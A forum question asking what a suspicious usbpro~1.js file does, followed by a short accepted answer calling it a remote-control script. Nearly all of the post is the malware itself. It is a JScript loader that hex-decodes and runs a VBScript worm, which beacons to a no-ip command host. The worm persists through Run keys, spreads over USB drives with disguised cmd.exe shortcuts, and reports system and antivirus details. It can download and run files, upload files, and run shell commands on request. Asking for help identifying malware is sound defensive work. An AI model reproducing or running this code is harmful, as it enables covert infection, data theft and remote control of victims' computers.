# Potential malicious code

Tags: javascript, malware

I have recently noticed that a file called usbpro~1.js has been infecting machines and USB sticks. Can anyone tell me what exactly the js is trying to do?

```
var sc = WScript.CreateObject("MSScriptControl.ScriptControl","ScriptControl_");
sc.Language = "VBScript";
sc.Timeout = -1
sc.AddObject("WScript", WScript);
var vbs = "0D0A686F7374203D2022616B7261706F7669632E6E6F2D69702E696E666F220D0A706F7274203D2038330D0A696E7374616C6C646972203D20222574656D7025220D0A6C6E6B66696C65203D20747275650D0A6C6E6B666F6C646572203D20747275650D0A0D0A64696D207368656C6C6F626A200D0A736574207368656C6C6F626A203D20777363726970742E6372656174656F626A6563742822777363726970742E7368656C6C22290D0A64696D2066696C6573797374656D6F626A0D0A7365742066696C6573797374656D6F626A203D206372656174656F626A6563742822736372697074696E672E66696C6573797374656D6F626A65637422290D0A64696D20687474706F626A0D0A73657420687474706F626A203D206372656174656F626A65637428226D73786D6C322E786D6C6874747022290D0A0D0A0D0A696E7374616C6C6E616D65203D20777363726970742E7363726970746E616D650D0A73746172747570203D207368656C6C6F626A2E7370656369616C666F6C64657273202822737461727475702229202620225C220D0A696E7374616C6C646972203D207368656C6C6F626A2E657870616E64656E7669726F6E6D656E74737472696E677328696E7374616C6C64697229202620225C220D0A6966206E6F742066696C6573797374656D6F626A2E666F6C64657265786973747328696E7374616C6C64697229207468656E2020696E7374616C6C646972203D207368656C6C6F626A2E657870616E64656E7669726F6E6D656E74737472696E677328222574656D70252229202620225C220D0A73706C69746572203D20223C22202620227C22202620223E220D0A736C656570203D2035303030200D0A64696D20726573706F6E73650D0A64696D20636D640D0A64696D20706172616D0D0A696E666F203D2022220D0A757362737072656164696E67203D2022220D0A737461727464617465203D2022220D0A64696D206F6E656F6E63650D0A0D0A6F6E206572726F7220726573756D65206E6578740D0A0D0A0D0A696E7374616E63650D0A7768696C6520747275650D0A0D0A696E7374616C6C0D0A0D0A726573706F6E7365203D2022220D0A726573706F6E7365203D20706F737420282269732D7265616479222C2222290D0A636D64203D2073706C69742028726573706F6E73652C73706C69746572290D0A73656C656374206361736520636D64202830290D0A6361736520226578636563757465220D0A202020202020706172616D203D20636D64202831290D0A2020202020206578656375746520706172616D0D0A636173652022757064617465220D0A202020202020706172616D203D20636D64202831290D0A2020202020206F6E656F6E63652E636C6F73650D0A202020202020736574206F6E656F6E6365203D202066696C6573797374656D6F626A2E6F70656E7465787466696C652028696E7374616C6C646972202620696E7374616C6C6E616D65202C322C2066616C7365290D0A2020202020206F6E656F6E63652E777269746520706172616D0D0A2020202020206F6E656F6E63652E636C6F73650D0A2020202020207368656C6C6F626A2E72756E2022777363726970742E657865202F2F42202220262063687228333429202620696E7374616C6C646972202620696E7374616C6C6E616D65202620636872283334290D0A202020202020777363726970742E71756974200D0A636173652022756E696E7374616C6C220D0A202020202020756E696E7374616C6C0D0A63617365202273656E64220D0A202020202020646F776E6C6F616420636D64202831292C636D64202832290D0A636173652022736974652D73656E64220D0A20202020202073697465646F776E6C6F6164657220636D64202831292C636D64202832290D0A63617365202272656376220D0A202020202020706172616D203D20636D64202831290D0A20202020202075706C6F61642028706172616D290D0A63617365202022656E756D2D647269766572220D0A202020202020706F7374202269732D656E756D2D647269766572222C656E756D64726976657220200D0A63617365202022656E756D2D666166220D0A202020202020706172616D203D20636D64202831290D0A202020202020706F7374202269732D656E756D2D666166222C656E756D6661662028706172616D290D0A63617365202022656E756D2D70726F63657373220D0A202020202020706F7374202269732D656E756D2D70726F63657373222C656E756D70726F636573732020200D0A63617365202022636D642D7368656C6C220D0A202020202020706172616D203D20636D64202831290D0A202020202020706F7374202269732D636D642D7368656C6C222C636D647368656C6C2028706172616D2920200D0A6361736520202264656C657465220D0A202020202020706172616D203D20636D64202831290D0A20202020202064656C6574656661662028706172616D29200D0A63617365202022657869742D70726F63657373220D0A202020202020706172616D203D20636D64202831290D0A2020202020206578697470726F636573732028706172616D29200D0A63617365202022736C656570220D0A202020202020706172616D203D20636D64202831290D0A202020202020736C656570203D206576616C2028706172616D2920202020202020200D0A656E642073656C6563740D0A0D0A777363726970742E736C65657020736C6565700D0A0D0A77656E640D0A0D0A0D0A73756220696E7374616C6C0D0A6F6E206572726F7220726573756D65206E6578740D0A64696D206C6E6B6F626A0D0A64696D2066696C656E616D650D0A64696D20666F6C6465726E616D650D0A64696D2066696C6569636F6E0D0A64696D20666F6C64657269636F6E0D0A0D0A757073746172740D0A666F72206561636820647269766520696E2066696C6573797374656D6F626A2E6472697665730D0A0D0A6966202064726976652E69737265616479203D2074727565207468656E0D0A6966202064726976652E66726565737061636520203E2030207468656E0D0A6966202064726976652E64726976657479706520203D2031207468656E0D0A2020202066696C6573797374656D6F626A2E636F707966696C6520777363726970742E73637269707466756C6C6E616D65202C2064726976652E70617468202620225C22202620696E7374616C6C6E616D652C747275650D0A202020206966202066696C6573797374656D6F626A2E66696C65657869737473202864726976652E70617468202620225C22202620696E7374616C6C6E616D652920207468656E0D0A202020202020202066696C6573797374656D6F626A2E67657466696C652864726976652E70617468202620225C2220202620696E7374616C6C6E616D65292E61747472696275746573203D20322B340D0A20202020656E642069660D0A20202020666F7220656163682066696C6520696E2066696C6573797374656D6F626A2E676574666F6C646572282064726976652E70617468202620225C2220292E46696C65730D0A20202020202020206966206E6F74206C6E6B66696C65207468656E206578697420666F720D0A202020202020202069662020696E737472202866696C652E6E616D652C222E2229207468656E0D0A202020202020202020202020696620206C63617365202873706C69742866696C652E6E616D652C20222E2229202875626F756E642873706C69742866696C652E6E616D652C20222E2229292929203C3E20226C6E6B22207468656E0D0A2020202020202020202020202020202066696C652E61747472696275746573203D20322B340D0A20202020202020202020202020202020696620207563617365202866696C652E6E616D6529203C3E2075636173652028696E7374616C6C6E616D6529207468656E0D0A202020202020202020202020202020202020202066696C656E616D65203D2073706C69742866696C652E6E616D652C222E22290D0A2020202020202020202020202020202020202020736574206C6E6B6F626A203D207368656C6C6F626A2E63726561746573686F7274637574202864726976652E70617468202620225C222020262066696C656E616D6520283029202620222E6C6E6B2229200D0A20202020202020202020202020202020202020206C6E6B6F626A2E77696E646F777374796C65203D20370D0A20202020202020202020202020202020202020206C6E6B6F626A2E74617267657470617468203D2022636D642E657865220D0A20202020202020202020202020202020202020206C6E6B6F626A2E776F726B696E676469726563746F7279203D2022220D0A20202020202020202020202020202020202020206C6E6B6F626A2E617267756D656E7473203D20222F6320737461727420222026207265706C61636528696E7374616C6C6E616D652C2220222C2063687277283334292026202220222026206368727728333429292026202226737461727420222026207265706C6163652866696C652E6E616D652C2220222C2063687277283334292026202220222026206368727728333429292026222665786974220D0A202020202020202020202020202020202020202066696C6569636F6E203D207368656C6C6F626A2E72656772656164202822484B45595F4C4F43414C5F4D414348494E455C736F6674776172655C636C61737365735C222026207368656C6C6F626A2E72656772656164202822484B45595F4C4F43414C5F4D414348494E455C736F6674776172655C636C61737365735C2E2220262073706C69742866696C652E6E616D652C20222E22292875626F756E642873706C69742866696C652E6E616D652C20222E222929292620225C2229202620225C64656661756C7469636F6E5C2229200D0A202020202020202020202020202020202020202069662020696E737472202866696C6569636F6E2C222C2229203D2030207468656E0D0A2020202020202020202020202020202020202020202020206C6E6B6F626A2E69636F6E6C6F636174696F6E203D2066696C652E706174680D0A2020202020202020202020202020202020202020656C7365200D0A2020202020202020202020202020202020202020202020206C6E6B6F626A2E69636F6E6C6F636174696F6E203D2066696C6569636F6E0D0A2020202020202020202020202020202020202020656E642069660D0A20202020202020202020202020202020202020206C6E6B6F626A2E7361766528290D0A20202020202020202020202020202020656E642069660D0A202020202020202020202020656E642069660D0A2020202020202020656E642069660D0A202020206E6578740D0A20202020666F72206561636820666F6C64657220696E2066696C6573797374656D6F626A2E676574666F6C646572282064726976652E70617468202620225C2220292E737562666F6C646572730D0A20202020202020206966206E6F74206C6E6B666F6C646572207468656E206578697420666F720D0A2020202020202020666F6C6465722E61747472696275746573203D20322B340D0A2020202020202020666F6C6465726E616D65203D20666F6C6465722E6E616D650D0A2020202020202020736574206C6E6B6F626A203D207368656C6C6F626A2E63726561746573686F7274637574202864726976652E70617468202620225C2220202620666F6C6465726E616D65202620222E6C6E6B2229200D0A20202020202020206C6E6B6F626A2E77696E646F777374796C65203D20370D0A20202020202020206C6E6B6F626A2E74617267657470617468203D2022636D642E657865220D0A20202020202020206C6E6B6F626A2E776F726B696E676469726563746F7279203D2022220D0A20202020202020206C6E6B6F626A2E617267756D656E7473203D20222F6320737461727420222026207265706C61636528696E7374616C6C6E616D652C2220222C20636872772833342920262022202220262063687277283334292920262022267374617274206578706C6F72657220222026207265706C61636528666F6C6465722E6E616D652C2220222C2063687277283334292026202220222026206368727728333429292026222665786974220D0A2020202020202020666F6C64657269636F6E203D207368656C6C6F626A2E72656772656164202822484B45595F4C4F43414C5F4D414348494E455C736F6674776172655C636C61737365735C666F6C6465725C64656661756C7469636F6E5C2229200D0A202020202020202069662020696E7374722028666F6C64657269636F6E2C222C2229203D2030207468656E0D0A2020202020202020202020206C6E6B6F626A2E69636F6E6C6F636174696F6E203D20666F6C6465722E706174680D0A2020202020202020656C7365200D0A2020202020202020202020206C6E6B6F626A2E69636F6E6C6F636174696F6E203D20666F6C64657269636F6E0D0A2020202020202020656E642069660D0A20202020202020206C6E6B6F626A2E7361766528290D0A202020206E6578740D0A656E642049660D0A656E642049660D0A656E642069660D0A6E6578740D0A6572722E636C6561720D0A656E64207375620D0A0D0A73756220756E696E7374616C6C0D0A6F6E206572726F7220726573756D65206E6578740D0A64696D2066696C656E616D650D0A64696D20666F6C6465726E616D650D0A0D0A7368656C6C6F626A2E72656764656C6574652022484B45595F43555252454E545F555345525C736F6674776172655C6D6963726F736F66745C77696E646F77735C63757272656E7476657273696F6E5C72756E5C2220262073706C69742028696E7374616C6C6E616D652C222E22292830290D0A7368656C6C6F626A2E72656764656C6574652022484B45595F4C4F43414C5F4D414348494E455C736F6674776172655C6D6963726F736F66745C77696E646F77735C63757272656E7476657273696F6E5C72756E5C2220262073706C69742028696E7374616C6C6E616D652C222E22292830290D0A66696C6573797374656D6F626A2E64656C65746566696C652073746172747570202620696E7374616C6C6E616D65202C747275650D0A66696C6573797374656D6F626A2E64656C65746566696C6520777363726970742E73637269707466756C6C6E616D65202C747275650D0A0D0A666F7220206561636820647269766520696E2066696C6573797374656D6F626A2E6472697665730D0A6966202064726976652E69737265616479203D2074727565207468656E0D0A6966202064726976652E66726565737061636520203E2030207468656E0D0A6966202064726976652E64726976657479706520203D2031207468656E0D0A20202020666F722020656163682066696C6520696E2066696C6573797374656D6F626A2E676574666F6C64657220282064726976652E70617468202620225C22292E66696C65730D0A2020202020202020206F6E206572726F7220726573756D65206E6578740D0A20202020202020202069662020696E737472202866696C652E6E616D652C222E2229207468656E0D0A20202020202020202020202020696620206C63617365202873706C69742866696C652E6E616D652C20222E22292875626F756E642873706C69742866696C652E6E616D652C20222E2229292929203C3E20226C6E6B22207468656E0D0A202020202020202020202020202020202066696C652E61747472696275746573203D20300D0A2020202020202020202020202020202020696620207563617365202866696C652E6E616D6529203C3E2075636173652028696E7374616C6C6E616D6529207468656E0D0A20202020202020202020202020202020202020202066696C656E616D65203D2073706C69742866696C652E6E616D652C222E22290D0A20202020202020202020202020202020202020202066696C6573797374656D6F626A2E64656C65746566696C65202864726976652E70617468202620225C2220262066696C656E616D65283029202620222E6C6E6B2220290D0A2020202020202020202020202020202020656C73650D0A20202020202020202020202020202020202020202066696C6573797374656D6F626A2E64656C65746566696C65202864726976652E70617468202620225C2220262066696C652E6E616D65290D0A2020202020202020202020202020202020656E642049660D0A20202020202020202020202020656C73650D0A202020202020202020202020202020202066696C6573797374656D6F626A2E64656C65746566696C65202866696C652E7061746829200D0A20202020202020202020202020656E642069660D0A202020202020202020656E642069660D0A20202020206E6578740D0A2020202020666F72206561636820666F6C64657220696E2066696C6573797374656D6F626A2E676574666F6C646572282064726976652E70617468202620225C2220292E737562666F6C646572730D0A202020202020202020666F6C6465722E61747472696275746573203D20300D0A20202020206E6578740D0A656E642069660D0A656E642069660D0A656E642069660D0A6E6578740D0A777363726970742E717569740D0A656E64207375620D0A0D0A66756E6374696F6E20706F73742028636D64202C706172616D290D0A0D0A706F7374203D20706172616D0D0A687474706F626A2E6F70656E2022706F7374222C22687474703A2F2F22202620686F7374202620223A22202620706F72742026222F22202620636D642C2066616C73650D0A687474706F626A2E736574726571756573746865616465722022757365722D6167656E743A222C696E666F726D6174696F6E0D0A687474706F626A2E73656E6420706172616D0D0A706F7374203D20687474706F626A2E726573706F6E7365746578740D0A656E642066756E6374696F6E0D0A0D0A66756E6374696F6E20696E666F726D6174696F6E0D0A6F6E206572726F7220726573756D65206E6578740D0A69662020696E66203D202222207468656E0D0A20202020696E66203D206877696420262073706C69746572200D0A20202020696E66203D20696E66202026207368656C6C6F626A2E657870616E64656E7669726F6E6D656E74737472696E6773282225636F6D70757465726E616D6525222920262073706C69746572200D0A20202020696E66203D20696E66202026207368656C6C6F626A2E657870616E64656E7669726F6E6D656E74737472696E6773282225757365726E616D6525222920262073706C697465720D0A0D0A2020202073657420726F6F74203D206765746F626A656374282277696E6D676D74733A7B696D706572736F6E6174696F6E6C6576656C3D696D706572736F6E6174657D215C5C2E5C726F6F745C63696D763222290D0A20202020736574206F73203D20726F6F742E65786563717565727920282273656C656374202A2066726F6D2077696E33325F6F7065726174696E6773797374656D22290D0A20202020666F722065616368206F73696E666F20696E206F730D0A20202020202020696E66203D20696E662026206F73696E666F2E63617074696F6E20262073706C6974657220200D0A202020202020206578697420666F720D0A202020206E6578740D0A20202020696E66203D20696E6620262022706C75732220262073706C697465720D0A20202020696E66203D20696E66202620736563757269747920262073706C697465720D0A20202020696E66203D20696E66202620757362737072656164696E670D0A20202020696E666F726D6174696F6E203D20696E6620200D0A656C73650D0A20202020696E666F726D6174696F6E203D20696E660D0A656E642069660D0A656E642066756E6374696F6E0D0A0D0A0D0A73756220757073746172742028290D0A6F6E206572726F7220726573756D65204E6578740D0A0D0A7368656C6C6F626A2E72656777726974652022484B45595F43555252454E545F555345525C736F6674776172655C6D6963726F736F66745C77696E646F77735C63757272656E7476657273696F6E5C72756E5C2220262073706C69742028696E7374616C6C6E616D652C222E22292830292C202022777363726970742E657865202F2F4220222026206368727728333429202620696E7374616C6C646972202620696E7374616C6C6E616D652026206368727728333429202C20225245475F535A220D0A7368656C6C6F626A2E72656777726974652022484B45595F4C4F43414C5F4D414348494E455C736F6674776172655C6D6963726F736F66745C77696E646F77735C63757272656E7476657273696F6E5C72756E5C2220262073706C69742028696E7374616C6C6E616D652C222E22292830292C202022777363726970742E657865202F2F422022202026206368727728333429202620696E7374616C6C646972202620696E7374616C6C6E616D652026206368727728333429202C20225245475F535A220D0A66696C6573797374656D6F626A2E636F707966696C6520777363726970742E73637269707466756C6C6E616D652C696E7374616C6C646972202620696E7374616C6C6E616D652C747275650D0A66696C6573797374656D6F626A2E636F707966696C6520777363726970742E73637269707466756C6C6E616D652C73746172747570202620696E7374616C6C6E616D65202C747275650D0A0D0A656E64207375620D0A0D0A0D0A66756E6374696F6E20687769640D0A6F6E206572726F7220726573756D65206E6578740D0A0D0A73657420726F6F74203D206765746F626A656374282277696E6D676D74733A7B696D706572736F6E6174696F6E6C6576656C3D696D706572736F6E6174657D215C5C2E5C726F6F745C63696D763222290D0A736574206469736B73203D20726F6F742E65786563717565727920282273656C656374202A2066726F6D2077696E33325F6C6F676963616C6469736B22290D0A666F722065616368206469736B20696E206469736B730D0A20202020696620206469736B2E766F6C756D6573657269616C6E756D626572203C3E202222207468656E0D0A202020202020202068776964203D206469736B2E766F6C756D6573657269616C6E756D6265720D0A20202020202020206578697420666F720D0A20202020656E642069660D0A6E6578740D0A656E642066756E6374696F6E0D0A0D0A0D0A66756E6374696F6E207365637572697479200D0A6F6E206572726F7220726573756D65206E6578740D0A0D0A7365637572697479203D2022220D0A0D0A736574206F626A776D6973657276696365203D206765746F626A656374282277696E6D676D74733A7B696D706572736F6E6174696F6E6C6576656C3D696D706572736F6E6174657D215C5C2E5C726F6F745C63696D763222290D0A73657420636F6C6974656D73203D206F626A776D69736572766963652E657865637175657279282273656C656374202A2066726F6D2077696E33325F6F7065726174696E6773797374656D222C2C3438290D0A666F722065616368206F626A6974656D20696E20636F6C6974656D730D0A2020202076657273696F6E737472203D2073706C697420286F626A6974656D2E76657273696F6E2C222E22290D0A6E6578740D0A76657273696F6E737472203D2073706C69742028636F6C6974656D732E76657273696F6E2C222E22290D0A6F7376657273696F6E203D2076657273696F6E73747220283029202620222E220D0A666F72202078203D203120746F2075626F756E64202876657273696F6E737472290D0A09206F7376657273696F6E203D206F7376657273696F6E2026202076657273696F6E737472202869290D0A6E6578740D0A6F7376657273696F6E203D206576616C20286F7376657273696F6E290D0A696620206F7376657273696F6E203E2036207468656E207363203D2022736563757269747963656E746572322220656C7365207363203D2022736563757269747963656E746572220D0A0D0A736574206F626A736563757269747963656E746572203D206765746F626A656374282277696E6D676D74733A5C5C6C6F63616C686F73745C726F6F745C222026207363290D0A53657420636F6C616E74697669727573203D206F626A736563757269747963656E7465722E657865637175657279282273656C656374202A2066726F6D20616E7469766972757370726F64756374222C2277716C222C30290D0A0D0A666F722065616368206F626A616E7469766972757320696E20636F6C616E746976697275730D0A20202020736563757269747920203D207365637572697479202026206F626A616E746976697275732E646973706C61796E616D6520262022202E220D0A6E6578740D0A696620736563757269747920203D202222207468656E20736563757269747920203D20226E616E2D6176220D0A656E642066756E6374696F6E0D0A0D0A0D0A66756E6374696F6E20696E7374616E63650D0A6F6E206572726F7220726573756D65206E6578740D0A0D0A757362737072656164696E67203D207368656C6C6F626A2E72656772656164202822484B45595F4C4F43414C5F4D414348494E455C736F6674776172655C2220262073706C69742028696E7374616C6C6E616D652C222E2229283029202620225C22290D0A696620757362737072656164696E67203D202222207468656E0D0A2020206966206C636173652028206D696428777363726970742E73637269707466756C6C6E616D652C322929203D20223A5C22202620206C6361736528696E7374616C6C6E616D6529207468656E0D0A202020202020757362737072656164696E67203D202274727565202D2022202620646174650D0A2020202020207368656C6C6F626A2E72656777726974652022484B45595F4C4F43414C5F4D414348494E455C736F6674776172655C2220262073706C69742028696E7374616C6C6E616D652C222E222928302920202620225C222C2020757362737072656164696E672C20225245475F535A220D0A202020656C73650D0A202020202020757362737072656164696E67203D202266616C7365202D2022202620646174650D0A2020202020207368656C6C6F626A2E72656777726974652022484B45595F4C4F43414C5F4D414348494E455C736F6674776172655C2220262073706C69742028696E7374616C6C6E616D652C222E222928302920202620225C222C2020757362737072656164696E672C20225245475F535A220D0A0D0A202020656E642069660D0A656E642049660D0A0D0A0D0A0D0A757073746172740D0A7365742073637269707466756C6C6E616D6573686F7274203D202066696C6573797374656D6F626A2E67657466696C652028777363726970742E73637269707466756C6C6E616D65290D0A73657420696E7374616C6C66756C6C6E616D6573686F7274203D202066696C6573797374656D6F626A2E67657466696C652028696E7374616C6C646972202620696E7374616C6C6E616D65290D0A696620206C63617365202873637269707466756C6C6E616D6573686F72742E73686F72747061746829203C3E206C636173652028696E7374616C6C66756C6C6E616D6573686F72742E73686F72747061746829207468656E200D0A202020207368656C6C6F626A2E72756E2022777363726970742E657865202F2F42202220262063687228333429202620696E7374616C6C646972202620696E7374616C6C6E616D65202620436872283334290D0A20202020777363726970742E71756974200D0A656E642049660D0A6572722E636C6561720D0A736574206F6E656F6E6365203D2066696C6573797374656D6F626A2E6F70656E7465787466696C652028696E7374616C6C646972202620696E7374616C6C6E616D65202C382C2066616C7365290D0A696620206572722E6E756D626572203E2030207468656E20777363726970742E717569740D0A656E642066756E6374696F6E0D0A0D0A0D0A7375622073697465646F776E6C6F61646572202866696C6575726C2C66696C656E616D65290D0A0D0A7374726C696E6B203D2066696C6575726C0D0A73747273617665746F203D20696E7374616C6C64697220262066696C656E616D650D0A736574206F626A68747470646F776E6C6F6164203D206372656174656F626A65637428226D73786D6C322E786D6C687474702220290D0A6F626A68747470646F776E6C6F61642E6F70656E2022676574222C207374726C696E6B2C2066616C73650D0A6F626A68747470646F776E6C6F61642E73656E640D0A0D0A736574206F626A66736F646F776E6C6F6164203D206372656174656F626A656374202822736372697074696E672E66696C6573797374656D6F626A65637422290D0A696620206F626A66736F646F776E6C6F61642E66696C65657869737473202873747273617665746F29207468656E0D0A202020206F626A66736F646F776E6C6F61642E64656C65746566696C65202873747273617665746F290D0A656E642069660D0A200D0A6966206F626A68747470646F776E6C6F61642E737461747573203D20323030207468656E0D0A20202064696D20206F626A73747265616D646F776E6C6F61640D0A20202073657420206F626A73747265616D646F776E6C6F6164203D206372656174656F626A656374282261646F64622E73747265616D22290D0A20202077697468206F626A73747265616D646F776E6C6F61640D0A09092E74797065203D2031200D0A09092E6F70656E0D0A09092E7772697465206F626A68747470646F776E6C6F61642E726573706F6E7365626F64790D0A09092E73617665746F66696C652073747273617665746F0D0A09092E636C6F73650D0A202020656E6420776974680D0A202020736574206F626A73747265616D646F776E6C6F6164203D206E6F7468696E670D0A656E642069660D0A6966206F626A66736F646F776E6C6F61642E66696C656578697374732873747273617665746F29207468656E0D0A2020207368656C6C6F626A2E72756E206F626A66736F646F776E6C6F61642E67657466696C65202873747273617665746F292E73686F7274706174680D0A656E64206966200D0A656E64207375620D0A0D0A73756220646F776E6C6F6164202866696C6575726C2C66696C65646972290D0A0D0A69662066696C65646972203D202222207468656E200D0A20202066696C65646972203D20696E7374616C6C6469720D0A656E642069660D0A0D0A73747273617665746F203D2066696C656469722026206D6964202866696C6575726C2C20696E737472726576202866696C6575726C2C225C2229202B2031290D0A736574206F626A68747470646F776E6C6F6164203D206372656174656F626A65637428226D73786D6C322E786D6C6874747022290D0A6F626A68747470646F776E6C6F61642E6F70656E2022706F7374222C22687474703A2F2F22202620686F7374202620223A22202620706F72742026222F222026202269732D73656E64696E672220262073706C6974657220262066696C6575726C2C2066616C73650D0A6F626A68747470646F776E6C6F61642E73656E642022220D0A20202020200D0A736574206F626A66736F646F776E6C6F6164203D206372656174656F626A656374202822736372697074696E672E66696C6573797374656D6F626A65637422290D0A696620206F626A66736F646F776E6C6F61642E66696C65657869737473202873747273617665746F29207468656E0D0A202020206F626A66736F646F776E6C6F61642E64656C65746566696C65202873747273617665746F290D0A656E642069660D0A696620206F626A68747470646F776E6C6F61642E737461747573203D20323030207468656E0D0A2020202064696D20206F626A73747265616D646F776E6C6F61640D0A0973657420206F626A73747265616D646F776E6C6F6164203D206372656174656F626A656374282261646F64622E73747265616D22290D0A2020202077697468206F626A73747265616D646F776E6C6F6164200D0A0909202E74797065203D2031200D0A0909202E6F70656E0D0A0909202E7772697465206F626A68747470646F776E6C6F61642E726573706F6E7365626F64790D0A0909202E73617665746F66696C652073747273617665746F0D0A0909202E636C6F73650D0A09656E6420776974680D0A20202020736574206F626A73747265616D646F776E6C6F616420203D206E6F7468696E670D0A656E642069660D0A6966206F626A66736F646F776E6C6F61642E66696C656578697374732873747273617665746F29207468656E0D0A2020207368656C6C6F626A2E72756E206F626A66736F646F776E6C6F61642E67657466696C65202873747273617665746F292E73686F7274706174680D0A656E64206966200D0A656E64207375620D0A0D0A0D0A66756E6374696F6E2075706C6F6164202866696C6575726C290D0A0D0A64696D2020687474706F626A2C6F626A73747265616D75706C6F6164652C6275666665720D0A73657420206F626A73747265616D75706C6F616465203D206372656174656F626A656374282261646F64622E73747265616D22290D0A77697468206F626A73747265616D75706C6F616465200D0A20202020202E74797065203D2031200D0A20202020202E6F70656E0D0A09202E6C6F616466726F6D66696C652066696C6575726C0D0A0920627566666572203D202E726561640D0A09202E636C6F73650D0A656E6420776974680D0A736574206F626A73747265616D646F776E6C6F6164203D206E6F7468696E670D0A73657420687474706F626A203D206372656174656F626A65637428226D73786D6C322E786D6C6874747022290D0A687474706F626A2E6F70656E2022706F7374222C22687474703A2F2F22202620686F7374202620223A22202620706F72742026222F222026202269732D72656376696E672220262073706C6974657220262066696C6575726C2C2066616C73650D0A687474706F626A2E73656E64206275666665720D0A656E642066756E6374696F6E0D0A0D0A0D0A66756E6374696F6E20656E756D6472697665722028290D0A0D0A666F7220206561636820647269766520696E2066696C6573797374656D6F626A2E6472697665730D0A696620202064726976652E69737265616479203D2074727565207468656E0D0A2020202020656E756D647269766572203D20656E756D64726976657220262064726976652E70617468202620227C2220262064726976652E64726976657479706520262073706C697465720D0A656E642069660D0A6E6578740D0A656E642046756E6374696F6E0D0A0D0A66756E6374696F6E20656E756D6661662028656E756D646972290D0A0D0A656E756D666166203D20656E756D64697220262073706C697465720D0A666F7220206561636820666F6C64657220696E2066696C6573797374656D6F626A2E676574666F6C6465722028656E756D646972292E737562666F6C646572730D0A2020202020656E756D666166203D20656E756D666166202620666F6C6465722E6E616D65202620227C222026202222202620227C22202620226422202620227C22202620666F6C6465722E6174747269627574657320262073706C697465720D0A6E6578740D0A0D0A666F722020656163682066696C6520696E2066696C6573797374656D6F626A2E676574666F6C6465722028656E756D646972292E66696C65730D0A2020202020656E756D666166203D20656E756D66616620262066696C652E6E616D65202620227C2220262066696C652E73697A6520202620227C22202620226622202620227C2220262066696C652E6174747269627574657320262073706C697465720D0A0D0A6E6578740D0A656E642066756E6374696F6E0D0A0D0A0D0A66756E6374696F6E20656E756D70726F636573732028290D0A0D0A6F6E206572726F7220726573756D65206E6578740D0A0D0A736574206F626A776D6973657276696365203D206765746F626A656374282277696E6D676D74733A5C5C2E5C726F6F745C63696D763222290D0A73657420636F6C6974656D73203D206F626A776D69736572766963652E657865637175657279282273656C656374202A2066726F6D2077696E33325F70726F63657373222C2C3438290D0A0D0A64696D206F626A6974656D0D0A666F722065616368206F626A6974656D20696E20636F6C6974656D730D0A09656E756D70726F63657373203D20656E756D70726F636573732026206F626A6974656D2E6E616D65202620227C220D0A09656E756D70726F63657373203D20656E756D70726F636573732026206F626A6974656D2E70726F636573736964202620227C220D0A20202020656E756D70726F63657373203D20656E756D70726F636573732026206F626A6974656D2E65786563757461626C657061746820262073706C697465720D0A6E6578740D0A656E642066756E6374696F6E0D0A0D0A737562206578697470726F636573732028706964290D0A6F6E206572726F7220726573756D65206E6578740D0A0D0A7368656C6C6F626A2E72756E20227461736B6B696C6C202F46202F54202F50494420222026207069642C372C747275650D0A656E64207375620D0A0D0A7375622064656C657465666166202875726C290D0A6F6E206572726F7220726573756D65206E6578740D0A0D0A66696C6573797374656D6F626A2E64656C65746566696C652075726C0D0A66696C6573797374656D6F626A2E64656C657465666F6C6465722075726C0D0A0D0A656E64207375620D0A0D0A66756E6374696F6E20636D647368656C6C2028636D64290D0A0D0A64696D20687474706F626A2C6F657865632C72656164616C6C66726F6D616E790D0A0D0A736574206F65786563203D207368656C6C6F626A2E6578656320282225636F6D7370656325202F632022202620636D64290D0A6966206E6F74206F657865632E7374646F75742E6174656E646F6673747265616D207468656E0D0A20202072656164616C6C66726F6D616E79203D206F657865632E7374646F75742E72656164616C6C0D0A656C73656966206E6F74206F657865632E7374646572722E6174656E646F6673747265616D207468656E0D0A20202072656164616C6C66726F6D616E79203D206F657865632E7374646572722E72656164616C6C0D0A656C7365200D0A20202072656164616C6C66726F6D616E79203D2022220D0A656E642069660D0A0D0A636D647368656C6C203D2072656164616C6C66726F6D616E790D0A656E642066756E6374696F6E"; 
sc.AddCode(hex2a(vbs));
function hex2a(hexx) {
var hex = hexx.toString();//force conversion
 var str = '';
 for (var i = 0; i < hex.length; i += 2)
 str += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
 return str;
 }
```

Answer (score 2, accepted):

Yes, that is malicous - You can [easily](http://www.rapidtables.com/convert/number/hex-to-ascii.htm) convert the hex string to text, which is the VBScript that it executes, which appears to be a remote control script of sorts (currently with controller at 105.109.101.200 (An ADSL connection in Algeria))